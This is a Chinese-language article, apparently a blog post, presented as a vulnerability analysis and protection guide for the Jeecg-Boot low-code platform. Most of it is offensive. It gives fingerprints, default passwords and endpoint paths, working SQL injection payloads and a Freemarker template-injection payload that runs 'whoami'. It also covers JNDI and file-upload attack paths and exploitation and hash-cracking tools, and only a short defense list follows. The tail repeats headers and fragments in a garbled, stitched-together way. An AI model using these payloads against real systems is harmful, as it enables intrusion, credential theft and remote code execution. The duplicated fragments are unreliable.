Jeecg-Boot 安全漏洞分析与防护指南<\/h1>

1. Jeecg-Boot 简介<\/h2>

JeecgBoot 是一款基于代码生成器的低代码开发平台，主要特点包括：<\/p>

前后端分离架构（Ant Design & Vue3, SpringBoot, SpringCloud Alibaba）<\/li>
强大的代码生成器功能<\/li>
集成AI应用能力（知识库问答、模型管理、流程编排等）<\/li>

支持多种AI大模型（ChatGPT、DeepSeek、Ollama等）<\/li> <\/ul>

官网地址：https:\/\/jeecg.com
开源项目地址：https:\/\/github.com\/zhangdaiscott\/jeecg-boot<\/p>

2. 资产识别方法<\/h2>

2.1 指纹特征<\/h3>

网页特征：\/sys\/common\/pdf\/pdfPreviewIframe<\/code>、"积木报表"、"Jeecg-Boot 快速开发平台"<\/li>
图标哈希：1380908726 或 -250963920<\/li>

加载动画特征<\/li>
<\/ul>
2.2 常见弱口令<\/h3>
admin\/123456
jeecg\/123456
admn\/admin
test\/test
demo\/test
jeecg\/jeecg123456
guest\/guest
<\/code><\/pre>
3. 高危漏洞分析<\/h2>
3.1 密码重置漏洞<\/h3>
路径<\/strong>：\/jeecg-boot\/sys\/user\/passwordChange<\/code>

方法<\/strong>：GET

参数<\/strong>：<\/p>
username=admin
password=admin
smscode=
phone=
<\/code><\/pre>
影响<\/strong>：任意用户密码重置<\/p>
3.2 信息泄露漏洞<\/h3>
3.2.1 用户信息泄露<\/h4>
路径<\/strong>：<\/p>

\/jeecg-boot\/sys\/user\/querySysUser?username=admin<\/code><\/li>
\/jeecg-boot\/sys\/user\/checkOnlyUser?username=admin<\/code><\/li>
<\/ul>
3.2.2 目录遍历<\/h4>
路径<\/strong>：\/jeecg-boot\/online\/cgform\/head\/fileTree?_t=1632524014&parentPath=\/<\/code>

影响<\/strong>：低权限账号可获取服务器文件目录信息<\/p>
3.3 SQL注入漏洞<\/h3>
3.3.1 \/sys\/dict\/queryTableData<\/code> SQL注入<\/h4>
版本<\/strong>：3.4.4及之前

方法<\/strong>：POST

路径<\/strong>：\/jeecg-boot\/sys\/dict\/queryTableData<\/code><\/p>
3.3.2 \/onlDragDatasetHead\/getTotalData<\/code> SQL注入<\/h4>
版本<\/strong>：3.7.1

方法<\/strong>：POST

路径<\/strong>：\/jeecg-boot\/drag\/onlDragDatasetHead\/getTotalData<\/code><\/p>
3.3.3 \/getDictItemsByTable<\/code> SQL注入<\/h4>
方法<\/strong>：GET

路径<\/strong>：\/jeecg-boot\/sys\/ng-alain\/getDictItemsByTable\/'%20from%20sys_user\/*,%20'\/x.js<\/code><\/p>
3.3.4 \/jmreport\/show<\/code> SQL注入<\/h4>
版本<\/strong>：3.5.0和3.5.1

方法<\/strong>：POST

路径<\/strong>：\/jeecg-boot\/jmreport\/show<\/code>

Payload示例<\/strong>：<\/p>
{
<\/span><\/span>  "id"<\/span>: "961455b47c0b86dc961e90b5893bff05"<\/span>,
<\/span><\/span>  "apiUrl"<\/span>: ""<\/span>,
<\/span><\/span>  "params"<\/span>: {
<\/span><\/span>    "id "<\/span>: "1 ' or ' % 1 % ' like (updatexml(0x3a,concat(1,(version())),1)) or ' % % ' like '"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.3.5 \/sys\/duplicate\/check<\/code> SQL注入<\/h4>
特点<\/strong>：需要身份认证

方法<\/strong>：GET

路径<\/strong>：\/jeecg-boot\/sys\/duplicate\/check<\/code>

参数<\/strong>：<\/p>
tableName=v3_hello
fieldName=1+and%09if(user(%20)='root@localhost',sleep(0),sleep(0))
fieldVal=1
dataId=asd
<\/code><\/pre>
3.4 模板注入漏洞<\/h3>
3.4.1 SSTI模板注入<\/h4>
路径<\/strong>：\/jeecg-boot\/jmreport\/loadTableData<\/code>

版本<\/strong>：3.5.3

Payload示例<\/strong>：<\/p>
{
<\/span><\/span>  "dbSource"<\/span>:""<\/span>,
<\/span><\/span>  "sql"<\/span>:"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'"<\/span>,
<\/span><\/span>  "tableName"<\/span>:"test_demo);"<\/span>,
<\/span><\/span>  "pageNo"<\/span>:1<\/span>,
<\/span><\/span>  "pageSize"<\/span>:10<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.4.2 AviatorScript表达式注入<\/h4>
路径<\/strong>：<\/p>

保存：\/jeecg-boot\/jmreport\/save<\/code><\/li>
触发：\/jeecg-boot\/jmreport\/show<\/code><\/li>
<\/ul>
3.4.3 Freemarker模板注入<\/h4>
路径<\/strong>：<\/p>

添加模板：\/jeecg-boot\/sys\/message\/sysMessageTemplate\/add<\/code><\/li>
发送模板：\/jeecg-boot\/sys\/message\/sysMessageTemplate\/sendMsg<\/code><\/li>
查看结果：\/jeecg-boot\/sys\/message\/sysMessage\/list<\/code><\/li>
<\/ol>
3.5 JNDI注入漏洞<\/h3>
版本<\/strong>：4.0及之前

路径<\/strong>：\/api\/..\/jeecgFormDemoController.do?interfaceTest=<\/code>

利用条件<\/strong>：<\/p>

依赖fastjson 1.2.31版本<\/li>
远程LDAP服务器<\/li>
<\/ul>
3.6 文件上传漏洞<\/h3>
3.6.1 未授权文件上传<\/h4>
路径<\/strong>：\/jeecg-boot\/jmreport\/upload<\/code>

特点<\/strong>：上传无需授权，但访问需要token<\/p>
3.6.2 路径遍历文件上传<\/h4>
路径<\/strong>：\/jeecg-boot\/api\/..\/commonController.do?parserXml<\/code>

方法<\/strong>：POST

Content-Type<\/strong>：multipart\/form-data<\/code><\/p>
4. 常见接口列表<\/h2>
4.1 信息类接口<\/h3>
\/v2\/api-docs
\/swagger-ui.html
\/env
\/actuator
\/mappings
\/metrics
\/beans
\/configprops
\/actuator\/metrics
\/actuator\/mappings
\/actuator\/beans
\/actuator\/configprops
\/actuator\/httptrace
\/druid\/index.html
\/druid\/sql.html
\/druid\/weburi.html
\/druid\/websession.html
\/druid\/weburi.json
\/druid\/websession.json
\/druid\/login.html
<\/code><\/pre>
4.2 用户管理接口<\/h3>
\/sys\/user\/list
\/sys\/user\/add
\/sys\/user\/edit
\/sys\/user\/queryById
\/sys\/user\/changePassword
\/sys\/user\/delete
\/sys\/user\/addSysUserRole
<\/code><\/pre>
4.3 权限管理接口<\/h3>
\/sys\/role\/list
\/sys\/role\/add
\/sys\/role\/edit
\/sys\/role\/queryPermission
\/sys\/role\/delete
\/sys\/menu\/list
\/sys\/menu\/add
\/sys\/menu\/edit
\/sys\/menu\/delete
<\/code><\/pre>
4.4 数据管理接口<\/h3>
\/online\/cgform\/list
\/online\/cgform\/add
\/online\/cgform\/edit
\/online\/cgform\/delete
\/online\/cgform\/fields\/{tableName}
\/online\/cgform\/table\/list
\/online\/cgform\/table\/sync
\/online\/cgform\/generateCode
<\/code><\/pre>
5. 漏洞利用工具<\/h2>
5.1 综合利用工具<\/h3>
项目地址<\/strong>：https:\/\/github.com\/Framework-vulnerability-tool\/jeecg

功能<\/strong>：<\/p>

远程命令执行<\/li>
SQL注入利用<\/li>
文件上传<\/li>
信息泄露<\/li>
JNDI注入等<\/li>
<\/ul>
5.2 离线密码爆破工具<\/h3>
项目地址<\/strong>：https:\/\/github.com\/ssrsec\/JeecgBoot-offline-brute

使用场景<\/strong>：通过SQL注入获取加密凭据后的离线爆破

使用方法<\/strong>：<\/p>

通过SQL注入获取用户名<\/code>、加密密码<\/code>和salt<\/code><\/li>
存入data.json<\/code><\/li>
准备密码字典pass.txt<\/code><\/li>
执行：java -jar JeecgBoot-offline-brute.jar<\/code><\/li>
<\/ol>
6. 防护建议<\/h2>

及时升级<\/strong>：保持Jeecg-Boot版本为最新<\/li>
权限控制<\/strong>：

严格限制接口访问权限<\/li>
禁用不必要的接口<\/li>
<\/ul>
<\/li>
输入验证<\/strong>：

对所有用户输入进行严格过滤<\/li>
使用参数化查询防止SQL注入<\/li>
<\/ul>
<\/li>
安全配置<\/strong>：

修改默认密码<\/li>
禁用调试接口<\/li>
限制文件上传类型<\/li>
<\/ul>
<\/li>
监控审计<\/strong>：

监控异常访问行为<\/li>
定期审计系统日志<\/li>
<\/ul>
<\/li>
<\/ol>
7. 总结<\/h2>
Jeecg-Boot作为一款流行的低代码开发平台，存在多种高危漏洞，攻击者可能通过这些漏洞获取系统权限、窃取敏感数据或破坏系统。安全团队应重点关注SQL注入、模板注入和文件上传等漏洞，并采取相应的防护措施。<\/p>

Jeecg-Boot 安全漏洞分析与防护指南<\/h1>

2. 资产识别方法<\/h2>

3. 高危漏洞分析<\/h2>

3.2.2 目录遍历<\/h4>
路径<\/strong>：`\/jeecg-boot\/online\/cgform\/head\/fileTree?_t=1632524014&parentPath=\/<\/code> 影响<\/strong>：低权限账号可获取服务器文件目录信息<\/p>`

3.4 模板注入漏洞<\/h3>

3.6 文件上传漏洞<\/h3>

3.6.1 未授权文件上传<\/h4>
路径<\/strong>：`\/jeecg-boot\/jmreport\/upload<\/code> 特点<\/strong>：上传无需授权，但访问需要token<\/p>`

5. 漏洞利用工具<\/h2>

Jeecg-Boot 安全漏洞分析与防护指南<\/h1>

2. 资产识别方法<\/h2>

3. 高危漏洞分析<\/h2>

3.2.2 目录遍历<\/h4> 路径<\/strong>：\/jeecg-boot\/online\/cgform\/head\/fileTree?_t=1632524014&parentPath=\/<\/code> 影响<\/strong>：低权限账号可获取服务器文件目录信息<\/p>

3.4 模板注入漏洞<\/h3>

3.6 文件上传漏洞<\/h3>

3.6.1 未授权文件上传<\/h4> 路径<\/strong>：\/jeecg-boot\/jmreport\/upload<\/code> 特点<\/strong>：上传无需授权，但访问需要token<\/p>

5. 漏洞利用工具<\/h2>

3.2.2 目录遍历<\/h4>
路径<\/strong>：`\/jeecg-boot\/online\/cgform\/head\/fileTree?_t=1632524014&parentPath=\/<\/code> 影响<\/strong>：低权限账号可获取服务器文件目录信息<\/p>`

3.6.1 未授权文件上传<\/h4>
路径<\/strong>：`\/jeecg-boot\/jmreport\/upload<\/code> 特点<\/strong>：上传无需授权，但访问需要token<\/p>`